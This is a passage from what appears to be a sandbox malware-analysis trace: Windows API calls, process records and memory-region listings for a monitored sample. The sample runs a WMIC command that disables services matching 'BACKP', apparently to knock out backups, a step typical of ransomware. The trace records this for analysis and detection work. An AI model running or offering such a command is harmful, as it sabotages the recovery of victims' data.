_String2="MOVE") returned 10 [0119.496] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0119.496] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0119.496] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0119.496] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0119.496] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0119.496] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0119.496] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0119.496] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0119.496] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0119.496] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0119.496] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0119.496] SetErrorMode (uMode=0x0) returned 0x0 [0119.496] SetErrorMode (uMode=0x1) returned 0x0 [0119.496] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45905d0, lpFilePart=0x28f064 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x28f064*="Desktop") returned 0x1d [0119.496] SetErrorMode (uMode=0x0) returned 0x1 [0119.496] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0119.496] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.501] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.503] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0xffffffff [0119.503] GetLastError () returned 0x2 [0119.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.503] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0xffffffff [0119.503] GetLastError () returned 0x2 [0119.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0xffffffff [0119.503] GetLastError () returned 0x2 [0119.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0xffffffff [0119.503] GetLastError () returned 0x2 [0119.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0x459b2b0 [0119.504] FindClose (in: hFindFile=0x459b2b0 | out: hFindFile=0x459b2b0) returned 1 [0119.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0xffffffff [0119.504] GetLastError () returned 0x2 [0119.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x28edf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28edf0) returned 0x459b2b0 [0119.504] FindClose (in: hFindFile=0x459b2b0 | out: hFindFile=0x459b2b0) returned 1 [0119.504] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.504] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.504] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.504] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f210, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f1f4 | out: lpAttributeList=0x28f210, lpSize=0x28f1f4) returned 1 [0119.504] UpdateProcThreadAttribute (in: lpAttributeList=0x28f210, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f1fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f210, lpPreviousValue=0x0) returned 1 [0119.504] GetStartupInfoW (in: lpStartupInfo=0x28f248 | out: lpStartupInfo=0x28f248*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0119.504] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0119.505] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0119.505] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.506] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x28f198*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f1e4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x28f1e4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9ec, dwThreadId=0x9cc)) returned 1 [0119.512] CloseHandle (hObject=0xa4) returned 1 [0119.512] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.512] GetEnvironmentStringsW () returned 0x4599f68* [0119.512] FreeEnvironmentStringsA (penv="=") returned 1 [0119.512] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0120.261] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x28f17c | out: lpExitCode=0x28f17c*=0x0) returned 1 [0120.262] CloseHandle (hObject=0xa8) returned 1 [0120.262] _vsnwprintf (in: _Buffer=0x28f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f184 | out: _Buffer="00000000") returned 8 [0120.262] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.262] GetEnvironmentStringsW () returned 0x459b3e0* [0120.262] FreeEnvironmentStringsA (penv="=") returned 1 [0120.262] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.262] GetEnvironmentStringsW () returned 0x459b3e0* [0120.262] FreeEnvironmentStringsA (penv="=") returned 1 [0120.262] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f210 | out: lpAttributeList=0x28f210) [0120.262] _get_osfhandle (_FileHandle=1) returned 0x3c [0120.262] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0120.262] _get_osfhandle (_FileHandle=1) returned 0x3c [0120.262] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0120.263] _get_osfhandle (_FileHandle=0) returned 0x38 [0120.263] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0120.263] SetConsoleInputExeNameW () returned 0x1 [0120.263] GetConsoleOutputCP () returned 0x1b5 [0120.263] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0120.263] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.263] exit (_Code=0) Thread: id = 301 os_tid = 0x604 Process: id = "68" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6fd98000" os_pid = "0xff8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0xff0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4411 start_va = 0x7fc8d000 end_va = 0x7fc8dfff entry_point = 0x0 region_type = private name = "private_0x000000007fc8d000" filename = "" Region: id = 4412 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4413 start_va = 0x5838250000 end_va = 0x583826ffff entry_point = 0x0 region_type = private name = "private_0x0000005838250000" filename = "" Region: id = 4414 start_va = 0x5838270000 end_va = 0x5838283fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005838270000" filename = "" Region: id = 4415 start_va = 0x5838290000 end_va = 0x58382cffff entry_point = 0x0 region_type = private name = "private_0x0000005838290000" filename = "" Region: id = 4416 start_va = 0x7df5fffd0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffd0000" filename = "" Region: id = 4417 start_va = 0x7ff6c43f0000 end_va = 0x7ff6c4412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43f0000" filename = "" Region: id = 4418 start_va = 0x7ff6c4415000 end_va = 0x7ff6c4415fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4415000" filename = "" Region: id = 4419 start_va = 0x7ff6c441e000 end_va = 0x7ff6c441ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c441e000" filename = "" Region: id = 4420 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 4421 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4422 start_va = 0x58383f0000 end_va = 0x58384effff entry_point = 0x0 region_type = private name = "private_0x00000058383f0000" filename = "" Region: id = 4423 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4424 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4425 start_va = 0x5838250000 end_va = 0x583825ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005838250000" filename = "" Region: id = 4426 start_va = 0x5838260000 end_va = 0x5838266fff entry_point = 0x0 region_type = private name = "private_0x0000005838260000" filename = "" Region: id = 4427 start_va = 0x58382d0000 end_va = 0x583838dfff entry_point = 0x58382d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4428 start_va = 0x5838390000 end_va = 0x58383cffff entry_point = 0x0 region_type = private name = "private_0x0000005838390000" filename = "" Region: id = 4429 start_va = 0x58383d0000 end_va = 0x58383d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000058383d0000" filename = "" Region: id = 4430 start_va = 0x58383e0000 end_va = 0x58383e6fff entry_point = 0x0 region_type = private name = "private_0x00000058383e0000" filename = "" Region: id = 4431 start_va = 0x58384f0000 end_va = 0x58384f0fff entry_point = 0x0 region_type = private name = "private_0x00000058384f0000" filename = "" Region: id = 4432 start_va = 0x5838500000 end_va = 0x5838500fff entry_point = 0x0 region_type = private name = "private_0x0000005838500000" filename = "" Region: id = 4433 start_va = 0x5838560000 end_va = 0x583856ffff entry_point = 0x0 region_type = private name = "private_0x0000005838560000" filename = "" Region: id = 4434 start_va = 0x5838570000 end_va = 0x58386f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005838570000" filename = "" Region: id = 4435 start_va = 0x5838700000 end_va = 0x5838880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005838700000" filename = "" Region: id = 4436 start_va = 0x5838890000 end_va = 0x5839c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005838890000" filename = "" Region: id = 4437 start_va = 0x7ff6c42f0000 end_va = 0x7ff6c43effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42f0000" filename = "" Region: id = 4438 start_va = 0x7ff6c441c000 end_va = 0x7ff6c441dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c441c000" filename = "" Region: id = 4439 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 4440 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4441 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4442 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4443 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4444 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4445 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4446 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4447 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4448 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4449 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4450 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 296 os_tid = 0xffc Thread: id = 297 os_tid = 0xc1c Thread: id = 298 os_tid = 0xc18 Process: id = "69" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x67d98000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0xff0" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4464 start_va = 0xe00000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 4465 start_va = 0xe20000 end_va = 0xe21fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 4466 start_va = 0xe30000 end_va = 0xe43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 4467 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 4468 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 4469 start_va = 0xed0000 end_va = 0xed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 4470 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 4471 start_va = 0xef0000 end_va = 0xef1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 4472 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 4473 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 4474 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4475 start_va = 0x7fc20000 end_va = 0x7fc42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc20000" filename = "" Region: id = 4476 start_va = 0x7fc49000 end_va = 0x7fc4bfff entry_point = 0x0 region_type = private name = "private_0x000000007fc49000" filename = "" Region: id = 4477 start_va = 0x7fc4c000 end_va = 0x7fc4cfff entry_point = 0x0 region_type = private name = "private_0x000000007fc4c000" filename = "" Region: id = 4478 start_va = 0x7fc4f000 end_va = 0x7fc4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc4f000" filename = "" Region: id = 4479 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4480 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4481 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4482 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4483 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4484 start_va = 0xf40000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 4485 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4486 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4487 start_va = 0xfa0000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 4488 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4489 start_va = 0xe00000 end_va = 0xe0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 4490 start_va = 0xe10000 end_va = 0xe13fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 4491 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 4492 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 4493 start_va = 0x10a0000 end_va = 0x115dfff entry_point = 0x10a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4494 start_va = 0x11e0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 4495 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4496 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4497 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4498 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4499 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4500 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4501 start_va = 0x76970000 